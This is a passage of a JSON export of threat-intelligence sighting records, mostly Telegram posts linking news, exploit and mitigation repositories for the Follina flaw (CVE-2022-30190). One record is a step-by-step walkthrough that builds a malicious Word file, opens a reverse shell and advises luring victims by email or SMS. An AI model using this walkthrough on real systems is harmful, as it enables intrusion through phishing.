\u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0412\u043f\u0440\u043e\u0447\u0435\u043c \u0447\u0435\u043c\u0443 \u0443\u0434\u0438\u0432\u043b\u044f\u0442\u044c\u0441\u044f.", "creation_timestamp": "2022-05-31T09:10:03.000000Z"}, {"uuid": "feed85d9-e3ba-4883-b94b-4edea94de93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/YfHS_0gw6mIFdSry5hyGG3ScC-HwbDfpqg-NLNfkx1fDKy8", "content": "", "creation_timestamp": "2022-06-14T02:39:12.000000Z"}, {"uuid": "c00590bf-d0b0-4bc9-8930-4547b9574389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/professional_c_h/1745", "content": "\ud83d\udca0 Follina - Microsoft MSDTC Vulnerability\n\n \ud83d\udc49\ud83c\udffb Follina is a remote code execution vulnerability where MSDT is invoked using the URL protocol from a calling application such as Word.  An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application.  The attacker can then install programs, view, modify or delete data, or create new accounts in the context allowed by the user's rights.\n\n \ud83d\udc41 An attacker can access a user's privileges using any application or even a shell.  An attacker can install programs, view, modify, delete data, or create new accounts with user privileges.  Follina's CVE number is CVE-2022-30190.\n\n\n Exploring Follina\n\n git clone https://github.com/JohnHammond/msdt-follina\n cd msdt-follina\n python3 follina.py -i X.X.X.X\n\n \ud83d\udcac In the above command, X.X.X.X is our IP address.  
This will create a malicious doc file that launches a listener for its HTML payload on port 8000. You can view the documents in the msdt-follina directory.\n\n \ud83d\udcda We need to send it to our target's Windows system.  This is where you can apply your SI to hook your target.  You can send it by mail or send a juicy SMS with a link to download a malicious DOC file.  We hosted it in our decentralized cloud storage.  (In order to use it externally, we need to use our external IP address and forward the required port).\n\n \ud83d\udc41\u200d\ud83d\udde8 Whenever our victim opens it and clicks \"Enable Editing\" in MS Word (for an older version of MS Office, this is not required, we can get them directly), we get a reverse connection to our Kali Linux, as in the screenshot  .\n\n \ud83d\udcbb But it can do much more if we create the payload with the following command, then we can even get a shell:\n\n python3 follina.py -r 7777\n\n \u2328\ufe0f In the above command we are using port 7777 to connect to the payload, here we can use any unused port.\n\n \ud83d\udc68\ud83c\udffb\u200d\ud83d\udcbb The above command will create a Netcat payload and start the listener, and it will also create a DOC file in the msdt-follina directory.  After our target clicked \"Enable Editing\", we got a shell on reconnect.\n\n \ud83d\udccc Now we can do everything that a user of the victim computer can do.  This vulnerability is unlikely to be fixed, at least in the past week.  
Our article is inspired by our friend NetworkChuck's video on YouTube, we can watch his next video (we made small changes to avoid mistakes).", "creation_timestamp": "2022-09-19T18:29:16.000000Z"}, {"uuid": "32900791-2ae7-40f9-8ec9-bfdc90bf4eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/HgWi9PhIzpFYcgYzXSCS4wMGhIJqav4sX4ysQ_39jTE3yw", "content": "", "creation_timestamp": "2022-12-08T15:32:35.000000Z"}, {"uuid": "0d38acc5-2458-4402-913a-ae0fa170f7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/643", "content": "https://www.hackbyte.org/microsoft-office-cve-2022-30190-vulnerability-follina-exploitation/", "creation_timestamp": "2022-06-03T08:12:32.000000Z"}, {"uuid": "40db59d0-02aa-4336-ab25-475554874960", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/cibsecurity/51161", "content": "\u203c CVE-2022-41081 \u203c\n\nWindows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-10-11T22:32:09.000000Z"}, {"uuid": "2257b7c4-1c28-45d3-9296-c09e31780eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30193", "type": "seen", "source": "https://t.me/cibsecurity/44581", "content": "\u203c CVE-2022-30167 \u203c\n\nAV1 Video Extension Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-30193.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-16T02:26:46.000000Z"}, {"uuid": "b7c8fc33-b308-4fc9-a8e7-7d0e1afb9244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30196", "type": "seen", "source": "https://t.me/cibsecurity/49688", "content": "\u203c CVE-2022-35833 \u203c\n\nWindows Secure Channel Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-30196.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-13T22:25:48.000000Z"}, {"uuid": "d1825c9f-ef91-4a01-a640-679c2d8d74b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/2018", "content": "\ud83d\udcc3 \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f MSDT 0-Day (CVE-2022-30190)\n \n\u0412\u0447\u0435\u0440\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0431\u0443\u0440\u043d\u043e\u0435 \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Microsoft Windows Support Diagnostic Tool (MSDT), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430, \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u0430\u043a Word.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 
\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 \u0414\u0436\u043e\u043d\u0430 \u0425\u0430\u043c\u043c\u043e\u043d\u0434\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u0438\u0434\u0435\u043e \u043e\u0442 \u043d\u0435\u0433\u043e, \u0441 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u043d\u0438\u0436\u0435.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0432\u0438\u0434\u0435\u043e\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC\n\n#redteam #rce #cve #windows", "creation_timestamp": "2022-06-02T14:10:28.000000Z"}, {"uuid": "8e60cbf5-b091-454f-89c6-6a9eec809530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30192", "type": "seen", "source": "https://t.me/cibsecurity/45370", "content": "\u203c CVE-2022-33638 \u203c\n\nMicrosoft Edge (Chromium-based) Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-30192, CVE-2022-33639.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T20:37:41.000000Z"}, {"uuid": "9c7c4907-08df-46f0-b575-b82a2271f380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cibsecurity/43626", "content": "\u203c CVE-2022-30190 \u203c\n\nMicrosoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-02T00:24:57.000000Z"}, {"uuid": "53433230-d877-4499-8d44-80e2b73adc2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/reverse_dungeon/2035", "content": "#cve #MSDT\n\n[ CVE-2022-30190 ]\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190?fbclid=IwAR0UczaWjJNKWTnlvZHCXsWhABuae0kDRKx3hj-wo0LS1y8TZ32HR5w9t3w", "creation_timestamp": "2022-06-03T13:07:43.000000Z"}, {"uuid": "bd322e21-7c68-47bc-a354-1d1028961fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47592", "content": "Chinese Threat Actors Exploiting 'Follina' Vulnerability\nhttps://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability\n\nThe Windows zero-day vulnerability identified as Follina and CVE-2022-30190 is being exploited in an increasing number of attacks, including by a Chinese APT group.\nread more (https://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability)", "creation_timestamp": 
"2022-06-01T12:55:45.000000Z"}, {"uuid": "e6051d57-6e6a-4230-aabe-31ee90585bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/theninjaway1337/1120", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.\nThe security issue can be triggered by either\u00a0opening or selecting a specially crafted document\u00a0and threat actors have been exploiting it in attacks since at least\u00a0April 2022.\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-16T05:24:42.000000Z"}, {"uuid": "7a0492ac-091c-478e-bfe4-065bfd9bb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47630", "content": "Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT\nhttps://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "6e1c8fe6-6d8c-44e5-a5e7-ded22c0838f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47631", "content": "A Zero-day Remote Code Execution Vulnerability with high severity has been identified as CVE-2022-30190 
\u201cFOLLINA\u201d in Microsoft Windows...\nThe post Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT (https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "fd672d46-a1da-4ef4-9a01-d1d7c78f81c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47699", "content": "'Follina' Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware\nhttps://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware\n\nSeveral malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch.\nread more (https://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware)", "creation_timestamp": "2022-06-09T16:13:49.000000Z"}, {"uuid": "b5145431-b081-4df4-bf75-51125c02432b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47738", "content": "Windows Updates Patch Actively Exploited 'Follina' Vulnerability\nhttps://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability\n\nMicrosoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.\nread more 
(https://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability)", "creation_timestamp": "2022-06-14T23:24:43.000000Z"}, {"uuid": "eccd4c12-eff8-458a-864b-47b015fba7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2127", "content": "#CVE-2022\n\nMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\n\nhttps://github.com/derco0n/mitigate-folina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:38:43.000000Z"}, {"uuid": "775c3ff8-355e-4ab9-8d4d-585b5fe13b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/thehackernews/3605", "content": "Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.  
\n \nRead: https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "creation_timestamp": "2023-07-17T11:34:30.000000Z"}, {"uuid": "a06dfbd2-4288-4e01-ae7c-1fdc86eb325b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2567", "content": "#CVE-2022\nProof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.\nhttps://github.com/zhuowei/WDBFontOverwrite\n\nThis repo contains payload for the CVE-2022-36067\nhttps://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067\n\nProof of concept for CVE-2022-30190 (Follina).\n\nhttps://github.com/winstxnhdw/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2023-01-21T16:19:17.000000Z"}, {"uuid": "c035a73c-211f-4455-b1ee-a4e2ff04b7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BlueRedTeam/2128", "content": "#CVE-2022\n\nThe CVE-2022-30190-follina Workarounds Patch\n\nhttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:41:22.000000Z"}, {"uuid": "aa42b911-131b-4908-9694-ad61329cf132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2129", "content": "#CVE-2022\n\nCVE-2022-30190 | MS-MSDT Follina One Click\n\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-04T00:11:27.000000Z"}, {"uuid": "24bb56c6-e1fc-4ae3-874c-419c77acd708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", 
"type": "exploited", "source": "https://t.me/BlueRedTeam/2144", "content": "#CVE-2022\n\nExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\n\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n@BlueRedTeam", "creation_timestamp": "2022-06-10T08:50:50.000000Z"}, {"uuid": "65319266-d74a-4a19-9e18-fa6b17634f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2169", "content": "#CVE-2022\n\nThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n@BlueRedTeam", "creation_timestamp": "2022-06-17T21:11:01.000000Z"}, {"uuid": "af48f052-65d4-47a6-b5ce-c64441c4aba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2170", "content": "#CVE-2022\n\nThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n@BlueRedTeam", "creation_timestamp": "2022-06-23T22:53:37.000000Z"}, {"uuid": "10a5af03-e7d5-430e-83a5-4cb3914e8b3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/VulnerabilityNews/30350", "content": "Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-22035, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.\nPublished at: October 11, 2022 at 09:15PM\nView on website", "creation_timestamp": "2022-10-11T22:42:22.000000Z"}, {"uuid": "e18d2113-dc5b-4cd3-ac68-555ff0333d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2122", "content": "#CVE-2022\n\nCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\n\nhttps://github.com/rayorole/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T10:46:04.000000Z"}, {"uuid": "1f2c5904-d3ec-4c16-b438-19aff43fdafc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2126", "content": "#CVE-2022\n\nA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T22:38:31.000000Z"}, {"uuid": "5b1a1056-2d58-4527-8cc9-de06f707c49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2460", "content": "#CVE-2022\n\n[+] Implementation of CVE-2022-30190 in C\n\nhttps://github.com/mattjmillner/CVE-Smackdown\n\n\n\n\n[+] Exploit POC for CVE-2022-42055 for GL-iNet routers using firmware below 3.215\n\nhttps://github.com/gigaryte/cve-2022-42055\n\n\n@BlueRedTeam", "creation_timestamp": "2022-11-16T00:09:22.000000Z"}, {"uuid": "a0c89c4f-0c19-4979-a6ee-d26a8a5a5bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/haccking/8039", "content": "\u0422\u0440\u043e\u044f\u043d Qbot \u0443\u0436\u0435 \u0432\u0437\u044f\u043b \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0432\u0435\u0436\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Windows MSDT\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043c\u0430\u043b\u0432\u0430\u0440\u044c Qbot \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Windows MSDT, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u043e\u0441\u0438\u0442 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Follina.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 Follina\u00a0\u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u00a0\u0432 \u043a\u043e\u043d\u0446\u0435 \u043c\u0430\u044f, \u0445\u043e\u0442\u044f \u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2022 \u0433\u043e\u0434\u0430, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u0438\u0437\u043d\u0430\u0442\u044c 
\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c\u00a0CVE-2022-30190, \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432 \u00ab\u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u0435\u00bb, \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u0447\u0435\u0440\u0435\u0437 Microsoft Diagnostic Tool (MSDT).\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-06-10T15:36:44.000000Z"}, {"uuid": "e404c09f-662d-4a94-94e5-749023113599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/haccking/8128", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0434\u043b\u044f 
\u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.doc -CVE-2022-30190", "creation_timestamp": "2022-06-26T17:45:36.000000Z"}, {"uuid": "ace34b7d-b44a-4437-be39-59d1eceed6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/575", "content": "https://github.com/aminetitrofine/CVE-2022-30190\n#github", "creation_timestamp": "2023-05-17T06:06:06.000000Z"}, {"uuid": "813cdaea-4d98-4123-b3b0-7110caf0aa89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/VulnerabilityNews/30351", "content": "Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.\nPublished at: October 11, 2022 at 09:15PM\nView on website", "creation_timestamp": "2022-10-11T22:42:23.000000Z"}, {"uuid": "16a27f7f-73cc-47e6-93d6-a765be7e45a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/DWuFghBm9DmmJST6bI9NuBgV03ST9Bw0n5hEo3vRPn0EqYFb", "content": "", "creation_timestamp": "2022-06-26T02:15:48.000000Z"}, {"uuid": "28181135-aef1-464a-9aa0-65ca6075b57b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/arvin_club/5491", "content": 